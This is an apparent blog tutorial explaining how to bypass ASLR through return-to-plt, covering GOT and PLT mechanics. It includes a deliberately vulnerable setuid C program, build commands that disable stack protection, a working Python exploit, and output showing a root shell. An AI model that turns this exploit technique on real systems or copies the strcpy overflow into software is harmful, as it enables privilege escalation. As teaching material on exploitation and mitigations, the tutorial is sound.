Bypassing ASLR – Part I

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that attacker needs to know

  • stack address (to jump to shellcode)
  • libc base address (to successfully bypass NX bit)

inorder to exploit a vulnerable code. Hence to thwart attacker’s action, security researchers came up with an exploit mitigation called “ASLR”!!

What is ASLR?

Address space layout randomization (ASLR) is an exploit mitigation technique that randomizes

  • Stack address.
  • Heap address.
  • Shared library address.

Once the above addresses are randomized, in particular when shared library address is randomized, the approach we took to bypass NX bit wont work since attacker needs to know libc base address. But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass shared library address randomization!!

We already know from previous post’s exp.py libc function address was calculated as follows:

libc function address = libc base address + function offset

where

  • libc base address was constant (0xb7e22000 – for our ‘vuln’ binary) since randomization was turned off.
  • function offset was also constant (obtained from “readelf -s libc.so.6 | grep “)

Now when we turn on full randomization (using below command)

#echo 2 > /proc/sys/kernel/randomize_va_space

libc base address would get randomized.

NOTE: Only libc base address is randomized, offset of a particular function from its base address always remains constant!! Hence if we can bypass shared library base address randomization, vulnerable programs can be successfully exploited (using below three techniques) even when ASLR is turned on!!

  • Return-to-plt (this post)
  • Brute force (part 2)
  • GOT overwrite and GOT dereference (part 3)

What is return-to-plt?

In this technique instead of returning to a libc function (whose address is randomized), attacker returns to a function’s PLT (whose address is NOT randomized – its address is known prior to execution itself). Since ‘function@PLT’ is not randomized, attacker no more needs to predict libc base address instead he can simply return to ‘function@PLT’ inorder to invoke ‘function’.

What is PLT, how does invoking ‘function@PLT’ invokes ‘function’?

To know about Procedural Linkage Table (PLT), let me brief about shared libraries!!

Unlike static libraries, shared libraries text segment is shared among multiple processes while its data segment is unique to each process. This helps in reducing memory and disk space. Since text segment is shared among multiple processes, it should have only Read and eXecute permissions and hence dynamic linker cannot relocate a data symbol or a function address present inside the text segment (since there is no write permission to it). Then how does dynamic linker relocate shared library symbols at runtime without modifying its text segment? Its done using PIC!!

What is PIC?

Position Independent Code (PIC) was developed to address this issue – It makes sure that shared libraries text segment is shared among multiple processes despite performing relocation at load time. PIC achieves this with a level of indirection – Shared libraries text segment doesnt contain absolute virtual address in place of global symbol and function references instead it points to a specific table in data segment. This table is the place-holder for global symbol and function’s absolute virtual address. Dynamic linker as part of relocation fills up this table. Thus while relocation only data segment is modified and text segment remains intact!!

Dynamic linker relocates global symbols and functions found in PIC in two different ways as described below:
  • Global Offset Table (GOT): Global offset table contains a 4 byte entry for each global variable, where the 4 byte entry contains the address of the global variable. When an instruction in code segment refers to a global variable, instead of global variable’s absolute virtual address the instruction points to an entry in GOT. This GOT entry is relocated by the dynamic linker when the shared library is loaded. Thus PIC uses this table to relocate global symbols with a single level of indirection.
  • Procedural Linkage Table (PLT)Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(function@PLT). This stub code with the help of dynamic linker resolves the function address and its copied to GOT (GOT[n]). This resolution happens only during the first invocation of the function (‘function’), later on when a call instruction in code segment calls the stub code ( function@PLT) instead of invoking dynamic linker to resolve the function address (‘function’), stub code directly obtains the function address from GOT (GOT[n]) and jumps to it.Thus PIC uses this table to relocate function addresses with two level of indirection.

Good you read about PIC and understood that it helps to keep shared libraries text segment intact and hence it helps shared libraries text segment to be really shared among many processes!!. But did you ever wonder, why on the earth executable’s text segment need to have a GOT entry or PLT stub code when its NOT shared among any process?!? Its because of security protection mechanism. Nowadays by default text segments are only given read and execute permission and no write permission (R_X). This security protection mechanism doesnt allow even the dynamic linker to write to text segment and hence it cant relocate data symbols or function address found inside the text segment. Hence to allow dynamic linker relocation, executables too need GOT entries and PLT stub codes just like shared libraries!!

Example:

//eg.c
//$gcc -g -o eg eg.c
#include <stdio.h>

int main(int argc, char* argv[]) {
 printf("Hello %s\n", argv[1]);
 return 0;
}

Below disassembly shows us that ‘printf’ isnt invoked directly instead its corresponding PLT code is invoked ‘printf@PLT’.

(gdb) disassemble main
Dump of assembler code for function main:
 0x080483e4 <+0>: push %ebp
 0x080483e5 <+1>: mov %esp,%ebp
 0x080483e7 <+3>: and $0xfffffff0,%esp
 0x080483ea <+6>: sub $0x10,%esp
 0x080483ed <+9>: mov 0xc(%ebp),%eax
 0x080483f0 <+12>: add $0x4,%eax
 0x080483f3 <+15>: mov (%eax),%edx
 0x080483f5 <+17>: mov $0x80484e0,%eax
 0x080483fa <+22>: mov %edx,0x4(%esp)
 0x080483fe <+26>: mov %eax,(%esp)
 0x08048401 <+29>: call 0x8048300 <printf@plt>
 0x08048406 <+34>: mov $0x0,%eax
 0x0804840b <+39>: leave 
 0x0804840c <+40>: ret 
End of assembler dump.
(gdb) disassemble 0x8048300
Dump of assembler code for function printf@plt:
 0x08048300 <+0>: jmp *0x804a000
 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0
End of assembler dump.
(gdb) 

Before printf’s first invocation, its corresponding GOT entry (0x804a000) points back to PLT code (0x8048306) itself. Thus when first time printf function is invoked, its corresponding function address gets resolved with the help of dynamic linker.

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0x08048306
(gdb)

Now after printf’s invocation, its corresponding GOT entry contains printf function address (as shown below):

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0xb7e6e850
(gdb)

NOTE 1: If you want to know more PLT’s and GOT’s, check out this blog post!!

NOTE 2: In a separate post, I’ll talk in detail about how a libc function address is resolved dynamically with the help of dynamic linker. As of now just remember that below two statements (part of printf@PLT) are responsible for function address resolution!!

 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0

Now with these knowledge, we come to know that attacker doesn’t need exact libc function address to invoke a libc function, he can simply invoke it using ‘function@PLT’ address (which is know prior to execution).

Vulnerable Code:

#include <stdio.h>
#include <string.h>

/* Eventhough shell() function isnt invoked directly, its needed here since 'system@PLT' and 'exit@PLT' stub code should be present in executable to successfully exploit it. */
void shell() {
 system("/bin/sh");
 exit(0);
}

int main(int argc, char* argv[]) {
 int i=0;
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Now disassembling executable ‘vuln’ we can find addresses of ‘system@PLT’ and ‘exit@PLT’

(gdb) disassemble shell
Dump of assembler code for function shell:
 0x08048474 <+0>: push %ebp
 0x08048475 <+1>: mov %esp,%ebp
 0x08048477 <+3>: sub $0x18,%esp
 0x0804847a <+6>: movl $0x80485a0,(%esp)
 0x08048481 <+13>: call 0x8048380 <system@plt>
 0x08048486 <+18>: movl $0x0,(%esp)
 0x0804848d <+25>: call 0x80483a0 <exit@plt>
End of assembler dump.
(gdb)

Using these addresses we can write an exploit code which bypasses ASLR (and NX bit)!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

system = 0x8048380
exit = 0x80483a0
system_arg = 0x80485b5     #Obtained from hexdump output of executable 'vuln'

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 272
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA������
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Inorder to to get this root shell, executable should contain ‘system@PLT’ and ‘exit@PLT’ code. In part III, I will discuss about GOT overwrite and GOT dereferencing techniques which helps attackers to invoke a libc function even when there is no required PLT stub code present in the executable and also when ASLR is turned on.

5 thoughts on “Bypassing ASLR – Part I

    • Nope I didnt understand your question properly. Can you please rephrase it? All I meant is when printf is invoked for the first time, dynamic linker would resolve it (lazy binding) and for subsequent calls since resolution is already happened, control jumps directly to libc’s printf function whose address is now present in its corresponding GOT entry!!

      Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s